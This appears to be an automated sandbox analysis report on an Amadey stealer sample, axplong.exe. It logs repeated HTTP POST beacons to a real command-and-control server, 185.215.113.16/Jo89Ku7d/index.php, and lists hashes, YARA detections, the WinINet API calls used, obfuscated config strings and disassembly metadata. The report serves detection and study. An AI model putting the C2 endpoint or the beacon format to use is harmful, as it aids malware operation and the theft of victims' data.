                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    59 | 192.168.2.6 | 56688 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:08:05.921688080 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:06.695524931 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    60 | 192.168.2.6 | 56689 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:08:06.809837103 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:07.508126974 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:08:07.514189959 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:07.740587950 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    61 | 192.168.2.6 | 56690 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:08:08.016844988 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:08.741755962 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0



                    Target ID:1
                    Start time:21:06:03
                    Start date:26/09/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x820000
                    File size:1'877'504 bytes
                    MD5 hash:5E8202D139D4F31CF0637105BFB93FCC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.2236057072.0000000000821000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.2195484295.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:21:06:06
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Imagebase:0x6d0000
                    File size:1'877'504 bytes
                    MD5 hash:5E8202D139D4F31CF0637105BFB93FCC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.2221928235.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.2262405635.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 50%, ReversingLabs
                    • Detection: 53%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    Target ID:3
                    Start time:21:06:06
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0x6d0000
                    File size:1'877'504 bytes
                    MD5 hash:5E8202D139D4F31CF0637105BFB93FCC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000002.2272371089.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000003.2231966463.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:8
                    Start time:21:07:00
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0x6d0000
                    File size:1'877'504 bytes
                    MD5 hash:5E8202D139D4F31CF0637105BFB93FCC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000008.00000003.2759333528.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                      Memory Dump Source
                      • Source File: 00000001.00000002.2238305965.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_50c0000_file.jbxd

                      Execution Graph

                      Execution Coverage:11.2%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:5.2%
                      Total number of Nodes:559
                      Total number of Limit Nodes:28

                      Control-flow Graph

                      • control_flow_graph 760, first block 6dbd60-6dbdac (node and edge list omitted); API calls named in the graph: InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile
                      APIs
                      • InternetOpenW.WININET(00728D70,00000000,00000000,00000000,00000000), ref: 006DBDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 006DBE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 006DBE5A
                      • HttpSendRequestA.WININET(?,00000000), ref: 006DBF1B
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 006DBFCD
                      • InternetCloseHandle.WININET(?), ref: 006DC0A7
                      • InternetCloseHandle.WININET(?), ref: 006DC0AF
                      • InternetCloseHandle.WININET(?), ref: 006DC0B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4s$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-2692989305
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-s
                      • API String ID: 3545240790-3040698226

                      Control-flow Graph

                      • control_flow_graph 915, first block 6d5df0-6d5eee (node and edge list omitted); API calls named in the graph: RegOpenKeyExA, RegEnumValueW
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150

                      Control-flow Graph

                      • control_flow_graph 1003, first block 6d7d00-6d7d82 (node and edge list omitted); API calls named in the graph: GetNativeSystemInfo
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D7EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                      • API String ID: 1721193555-2057465332

                      Control-flow Graph

                      • control_flow_graph 1141, first block 706e01-706e36 (node and edge list omitted); API calls named in the graph: GetFileType, GetFileInformationByHandle
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00706E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00706E7D
                      • __dosmaperr.LIBCMT ref: 00706F12
                        • Part of subcall function 00707177: __dosmaperr.LIBCMT ref: 007071AC
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0

                      Control-flow Graph

                      • control_flow_graph 1376, first block 70d4f4-70d515 (node and edge list omitted); API calls named in the graph: RtlAllocateHeap
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: hpGp
                      • API String ID: 0-1679474782

                      Control-flow Graph

                      • control_flow_graph 1470, first block 6d82b0-6d8331 (node and edge list omitted); API calls named in the graph: GetNativeSystemInfo
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 006D8454
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0

                      Control-flow Graph

                      • control_flow_graph 1516, first block 706c99-706ca5 (node and edge list omitted); API calls named in the graph: CreateFileW
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmp
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dbeb030267bcd835465aac94c6bb19745593586cea972788b061dfd283857965
                      • Instruction ID: 523b30ad188bef1afd6e3534a06321b9067902bf2420d4e9b49053f4d7e33878
                      • Opcode Fuzzy Hash: dbeb030267bcd835465aac94c6bb19745593586cea972788b061dfd283857965
                      • Instruction Fuzzy Hash: C821F572A01208FEEF11BB649C56B9F37A99F41778F200311F9243B1D1DBB8AE15D6A1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1550 706f71-706f87 1551 706f97-706fa7 1550->1551 1552 706f89-706f8d 1550->1552 1556 706fe7-706fea 1551->1556 1557 706fa9-706fbb SystemTimeToTzSpecificLocalTime 1551->1557 1552->1551 1553 706f8f-706f95 1552->1553 1554 706fec-706ff7 call 6ecf21 1553->1554 1556->1554 1557->1556 1559 706fbd-706fdd call 706ff8 1557->1559 1562 706fe2-706fe5 1559->1562 1562->1554
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00706FB3
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: cd75351436d3db589aedadb467af63aa35543fbf372932aa0e642906dc46dd17
                      • Instruction ID: 1cede9797f16cab6d3e28a28f5e85487ee1f95b48814a84deace78bec9f5f087
                      • Opcode Fuzzy Hash: cd75351436d3db589aedadb467af63aa35543fbf372932aa0e642906dc46dd17
                      • Instruction Fuzzy Hash: D21106B690020DEADB00EA95D890EDFB7FCAF08314F604266F511E2180EB38FB55CB61

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1563 70d6ef-70d6fa 1564 70d708-70d70e 1563->1564 1565 70d6fc-70d706 1563->1565 1567 70d710-70d711 1564->1567 1568 70d727-70d738 RtlAllocateHeap 1564->1568 1565->1564 1566 70d73c-70d747 call 707443 1565->1566 1574 70d749-70d74b 1566->1574 1567->1568 1570 70d713-70d71a call 709c81 1568->1570 1571 70d73a 1568->1571 1570->1566 1576 70d71c-70d725 call 708cf9 1570->1576 1571->1574 1576->1566 1576->1568
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0070A5ED,?,007074AE,?,00000000,?), ref: 0070D730
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: cca7d4b441b2743a02d5620d3898433d764b3807e75ab8af6ee3bb14362be2ce
                      • Instruction ID: 2ebc61f383505227a522a9d5f5859dd55de7a0d6245d26d7ac72ea562d41122c
                      • Opcode Fuzzy Hash: cca7d4b441b2743a02d5620d3898433d764b3807e75ab8af6ee3bb14362be2ce
                      • Instruction Fuzzy Hash: 2AF0E031545324E6EB322AA59C05B5B3BD59F41770B19A311BC04E61C1DA6CEC0046F1

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 231009cf0b69f7f59c51001dc13be61522d614c3aae0f7853364956fa1b7222d
                      • Instruction ID: c479ba44a862227f6b67736b52494c9f04b98e377f905a5d1d10a64eb0560fa0
                      • Opcode Fuzzy Hash: 231009cf0b69f7f59c51001dc13be61522d614c3aae0f7853364956fa1b7222d
                      • Instruction Fuzzy Hash: A7F0F971E00644ABC7107B79DC0771E7B76A706760F80035DE811673E2DA38590547D6
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c797ae7f516d4e5361ab21d48a393eee6b0577f17b680c9882d5cf45099ec39e
                      • Instruction ID: 36d15f26df368fe0a52eb1e97cbfa389b7604aa4c2b7f144951810092d5dfbbf
                      • Opcode Fuzzy Hash: c797ae7f516d4e5361ab21d48a393eee6b0577f17b680c9882d5cf45099ec39e
                      • Instruction Fuzzy Hash: A23108E724D115BEA24291852B549FB7B2FE7C7338B388427F403C6542FEC42A5B6172
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4s$fed3aa
                      • API String ID: 0-906029795
                      • Opcode ID: cbafdb1940c822ca6cf8a5433b5be8272e7ac70c281e467e155477b7f8189903
                      • Instruction ID: 9ba633ec9ab0228bbd20e366e3d8c7b547e7a8163542637a8497d90b284238ad
                      • Opcode Fuzzy Hash: cbafdb1940c822ca6cf8a5433b5be8272e7ac70c281e467e155477b7f8189903
                      • Instruction Fuzzy Hash: B972F670E05388DBEF14EF68C9497DE7BB6AB41304F50819DE8056B3C2D7799A84CB92
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 610e47a81e04a8ab313e5464c5c3e7bd6ff3d3c0fd9120343d2d36a106d37ccf
                      • Instruction ID: 11d617e28fbb4dde361b17db458d03c794cc8085d721c8b775073c8c18b09ab6
                      • Opcode Fuzzy Hash: 610e47a81e04a8ab313e5464c5c3e7bd6ff3d3c0fd9120343d2d36a106d37ccf
                      • Instruction Fuzzy Hash: 8EC21B71E086288FDB25CE28DD447E9B7B9EB48315F1441EAD84DE7280E779AEC58F40
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction ID: 2f32493ded070a97f7de9f7f35a72eadd71545e6be41eae8ee1dbf049eabd3f0
                      • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction Fuzzy Hash: E3F12C71E002199FDF14CFACC8806EEB7B5FF48314F15826AE819A7385D735AE528B94
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 006D247E
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: 'knd+s$'knd+s
                      • API String ID: 2659868963-2223898734
                      • Opcode ID: 6660bbd854475553af4894018db25253dc53cd43e4715a30cfb7af0b51aa6031
                      • Instruction ID: 9267820d37a82a8b3ee9d11070d9724185ad4f9bfd58ef97cdd45f91d19bfca2
                      • Opcode Fuzzy Hash: 6660bbd854475553af4894018db25253dc53cd43e4715a30cfb7af0b51aa6031
                      • Instruction Fuzzy Hash: EC51A9B1A017498FEB19CF5ADC857AABBF6FB08310F24C52AD404EB291D3789941CF54
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,006ECE82,?,?,?,?,006ECEB7,?,?,?,?,?,?,006EC42D,?,00000001), ref: 006ECB33
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      • Opcode ID: 2752a818bfdcfbc0ff6505cb250b2fe19b2a898af02873179bee6f712a0b98d7
                      • Instruction ID: c60033ec4ed83dab4de9292edc34dc9c4f33c166ca119d5f987a570a378ce02b
                      • Opcode Fuzzy Hash: 2752a818bfdcfbc0ff6505cb250b2fe19b2a898af02873179bee6f712a0b98d7
                      • Instruction Fuzzy Hash: F0D022325036B8DBCA213B99AC098EDBB4A9A00B203418112EC0827220CA906C034BE8
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: 87019e20bb088422450625af2529c8baac87a4fb667cb65ef2f4fe52fa81607b
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: CE517470E0D649EADB3C8A38C8DA7BE67DA9F51300F140759E482DB6C2CA5DBD46C352
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e02b63d657d967d02c0d224c5f00c433c1d78a32b81238f3a0d8bea4b99122ac
                      • Instruction ID: 141bb393fb31d69f40588ec68963e1d1dcc979645e2dcd65b6ce50bac2bb7f9b
                      • Opcode Fuzzy Hash: e02b63d657d967d02c0d224c5f00c433c1d78a32b81238f3a0d8bea4b99122ac
                      • Instruction Fuzzy Hash: D62251B3F515144BDB4CCB5DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158648
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 79461097934ef0765da3ed4925a050a8093cb179f6cbc79553c813dda6c354af
                      • Instruction ID: 75e3bace1ecf22bf17f8cf2dc4698de858608a809aa79c1bd9f085b83ae99db5
                      • Opcode Fuzzy Hash: 79461097934ef0765da3ed4925a050a8093cb179f6cbc79553c813dda6c354af
                      • Instruction Fuzzy Hash: FAB12A316146099FD719CF2CC486BA57BB1FF49364F258658E89ACF2E1C739E982CB40
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cb6cf6b7988d77bb8aaa04a04cc3a2e38973c93858cafe73c2d7772ed7bf3b56
                      • Instruction ID: 07f6f9e9c3a400d41dad9351ac9d4118cb2566ca5dbdec3a891d0fa918ba9133
                      • Opcode Fuzzy Hash: cb6cf6b7988d77bb8aaa04a04cc3a2e38973c93858cafe73c2d7772ed7bf3b56
                      • Instruction Fuzzy Hash: 6051C27060D3D18FD359CF2D851563ABFE2AF95200F084A9EE0D687392DB79DA44CB92
                      Memory Dump Source
